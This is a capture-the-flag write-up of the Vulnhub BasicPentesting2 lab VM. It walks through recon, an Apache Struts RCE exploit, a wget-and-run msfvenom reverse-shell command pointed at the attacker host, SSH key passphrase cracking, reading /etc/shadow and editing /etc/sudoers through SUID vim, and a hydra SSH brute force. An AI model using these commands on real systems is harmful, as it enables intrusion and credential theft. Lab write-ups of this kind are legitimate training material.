Vulnhub Writeup : BasicPentesting2 -

Box Stats :

Box Information	Details
Box Name	BasicPentesting2
Series	Basic Pentesting
Release Date	10 Jul 2018
Author	Josiah Pierce
Difficulty	Medium
Download Link	Link

Table of Contents

Network Scan

The IP of target vm is 192.168.56.103.

$ nmap -sV 192.168.56.103 -oN nmap.scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-12 18:03 UTC
Nmap scan report for 192.168.56.103
Host is up (0.00020s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

Some interesting findings are :

OpenSSH 7.2p2
Web Server on port 80
Also tomcat server is running on port 8080

Now open web page

There is nothing special on the web page.

Web Server Reconnaissance

Directory Bruteforce

Scan the web server for some hidden urls, directories or path, with dirb.

$ dirb http://192.168.56.103/ -o dirb.scan

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb.scan
START_TIME: Sun Jan 12 18:17:14 2020
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.103/ ----
==> DIRECTORY: http://192.168.56.103/development/
+ http://192.168.56.103/index.html (CODE:200|SIZE:158)
+ http://192.168.56.103/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.56.103/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Jan 12 18:17:15 2020
DOWNLOADED: 4612 - FOUND: 2

As we can see there is a development directory, lets open it.

There are two text file :

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
 to host that on this server too. Haven't made any real web apps yet, but I have tried that example
 you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -
 
2018-04-22: SMB has been configured. -K
 
2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:
 
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.
-K

These are look like chat files, but in first file there is a conversations about apache struts version 2.5.12 installation, means there is apache structs app installed on the server, which works with java servlet, and it is on port 8080. We know that ApacheStruts version 2.5.12 is vulnerable to remote code execution, for more details about the vulnerability visit the link. Also the testing of vulnerability is explained on that post, so just follow the instructions.

Download exploit from here : https://www.exploit-db.com/exploits/42627

Start an HTTP Server on port 1234, i am using php interpreter

 php -S 192.168.56.1:1234
 PHP 7.2.24-0ubuntu0.18.04.1 Development Server started at Fri Dec 27 18:31:57 2019
 Listening on http://192.168.56.1:1234
 Document root is /home/ajay
 Press Ctrl-C to quit.

Now run the exploit :

 $ python3 exploit.py http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3 \ 
           "wget http://192.168.56.1:1234/Vulnerable"

And our local web server is called by the Apache Struts server, means we can get remote code execution on the struts server.

Getting Reverse Shell

Generating reverse shell payload with msfvenom

$ msfvenom -p linux/x64/shell_reverse_tcp -f elf LHOST=192.168.56.1 LPORT=1234 -o rev_shell

Starting netcat listener at oprt 1234

$ nc -lvvp 1234

Hosting our reverse shell backdoor on local web server,

http://192.168.56.1/rev_shell

Now the idea is we have to trigger apache struts RCE vulnerability and force the target VM to download the backdoor and execute it, which basically connects back to our listener, and then we gat a reverse shell on the target server. The addresses are :

Target url :

http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3

Backdoor file location :

http://192.168.56.1/rev_shell

Command to execute on the target :

cd /tmp/;wget http://192.168.56.1/rev_shell;chmod +x rev_shell;./rev_shell

Running the exploit :

$ python3 exploit.py http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3 "cd /tmp/;wget \    
      http://192.168.56.1:8080/rev_shell;chmod +x rev_shell;./rev_shell"

and we get a reverse shell on our nc listener prompt

Starting a tty shell with python pty library

python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

Method 1

Lets try to go to /home/ directory, so we can look at number of users on the system.

tomcat9@basic2:/home$ ls
 
jan  kay

There are two users “jan” and “kay”. Lets check the jan’s folder first

tomcat9@basic2:/home$ cd jan
tomcat9@basic2:/home/jan$ ls -al

total 16
drwxr-xr-x 2 root root 4096 Nov 29 16:55 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst
-rw------- 1 root jan   602 Nov 29 16:55 .viminfo

There’s nothing interesting, now checking kay’s directory

$ ls -al

total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   937 Jan 13 23:52 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Nov 29 17:05 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak

Theres .ssh folder and inside that we found the private ssh rsa keys id_rsa for user kay. Now with that we can logged in as kay.

$ ls
 
authorized_keys  id_rsa  id_rsa.pub

But first we need to crack the passphrase for the user kay. For this we are going to use johntheripper. Download the id_rsa file on attacker machine and convert it on crackable format for JTR with ssh2john.py You can download it from here : Download Link

$ python ssh2john.py id_rsa  > rsa_key.dat

$ john rsa_key.dat

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:44  3/3 0g/s 3137Kp/s 3137Kc/s 3137KC/s nl1nt..nl1sj
0g 0:00:00:46  3/3 0g/s 3178Kp/s 3178Kc/s 3178KC/s mdgblk..mdgbjn
0g 0:00:01:03  3/3 0g/s 3409Kp/s 3409Kc/s 3409KC/s rymagns..rymagls
0g 0:00:01:04  3/3 0g/s 3420Kp/s 3420Kc/s 3420KC/s 3gsimg..3gsigs
0g 0:00:01:08  3/3 0g/s 3461Kp/s 3461Kc/s 3461KC/s ff68br3..ff68bck
beeswax          (id_rsa_key)

The passphrase is beeswax, now login as kay with the id_rsa_key and password “beeswax”

$ ssh -i id_rsa kay@localhost    

Could not create directory '/home/tomcat9/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/home/tomcat9/.ssh/known_hosts).
Enter passphrase for key 'id_rsa': beeswax

Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Jan 13 23:44:21 2020 from ::1
kay@basic2:~$

There is a file pass.bak

$ ls
pass.bak
$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Which possibly is password for root users, now lets try it.

$ sudo -i
[sudo] password for kay: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
 
root@basic2:~#

Yep!!, we got the root shell.

$ ls

flag.txt
root@basic2:~# cat flag.txt

Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain 
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send 
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.

Happy hacking!
root@basic2:~#

And Thats it!!! there is a flag.txt file, we won !!.

Method 2

Finding SUID root Binaries : Lets try to find the binary executables with SUID root.

$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null

-rwsr-xr-x 1 root root 38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 428240 Jan 18  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 2437320 Nov 24  2016 /usr/bin/vim.basic
-rwsr-xr-x 1 root root 23376 Jan 17  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 May 16  2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 May 16  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 Nov 30  2017 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Nov 30  2017 /bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping

As we can see vim is also has SUID root, means we can open/edit root privileged files with vim. So we are now going to crack user passwords from /etc/shadow file.

With vim we can open /etc/shadow file can then try to crack the password for users with john.

$ vim /etc/shadow

Editing with vim on a reverse shell is cumbersome, so try to press Return until you get the usernames, and it will be look like this

There are some parts of it missing, so we write the buffer in new file at /home/code.hash file with command mode on vim by command :w /home/code.hash. Now we are interested in cracking only two accounts

kay:$6$ON8Wi9Ow$Puwzhgbc2chaNEqWFO/UVH2yJ5zVb3WirwtCxQ5ssr2OEMAuYCrHscUNe.KPUhH6ND4CYx9WWu449W3mrzVtk/:17644:0:99999:7:::
jan:$6$Bbz6m7oU$WjYF4ZiF/QuPuiNAzl7bthT8LvIWikymEtX6tZ0WplHQUmMezufOCrKQRdxqbP8j03.x.pXv04xDgexxwbIIG0:17640:0:99999:7:::

Cracking with john

$ john shadow.dat
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
armando          (jan)

We get the jan’s password with is armando. Now lets try it.

$ su - jan
 
Password: armando
 
jan@basic2:~$

Editing /etc/sudoers file : By editing into /etc/sudoers file we can give the user jan root permission. We just need to add

jan ALL=(ALL:ALL) ALL

on the file. Now open file with vim and add the above line, it gives the jan to login as root

$ vim /etc/sudoers

Now to move cursor below press return and to edit press i then after edit press ‘Esc + :'(for command mode) and type :wq! and hit return. Now after edit, the file will look like this :

As we can see jan is also listed on sudoer list

$ sudo -l
 
[sudo] password for jan: armando
 
Matching Defaults entries for jan on basic2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User jan may run the following commands on basic2:
     (ALL : ALL) ALL

Now getting a root shell

$ sudo su -
 
root@basic2:~# ls
ls
flag.txt
 
root@basic2:~#

Method 2

Enumeration with enum4linux : Enum4linux is a tool for enumerating information from windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.

$ enum4linux 192.168.56.103

It generated a very long result, some of the important details are :

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

Bruteforcing ssh : We can get the usernames, now we can bruteforce the ssh passwords with above usernames with hydra.

$ hydra -l jan -P rockyou.txt 192.168.56.103 -t 10 ssh -o success

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-14 07:21:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 14344289 to do in 2173:23h, 10 active
[STATUS] 86.67 tries/min, 260 tries in 00:03h, 14344139 to do in 2758:30h, 10 active
[STATUS] 72.86 tries/min, 510 tries in 00:07h, 14343889 to do in 3281:17h, 10 active
[22][ssh] host: 192.168.56.103   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-14 07:32:10

password is : “armando”

$ ssh jan@192.168.56.103
jan@192.168.56.103's password: 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Fri Nov 29 16:53:56 2019 from 192.168.56.1
jan@basic2:~$

Vulnhub Writeup : BasicPentesting2

Network Scan

Web Server Reconnaissance

Directory Bruteforce

Getting Reverse Shell

Privilege Escalation

Method 1

Method 2

Method 2

Published by Admin

Leave a Reply Cancel reply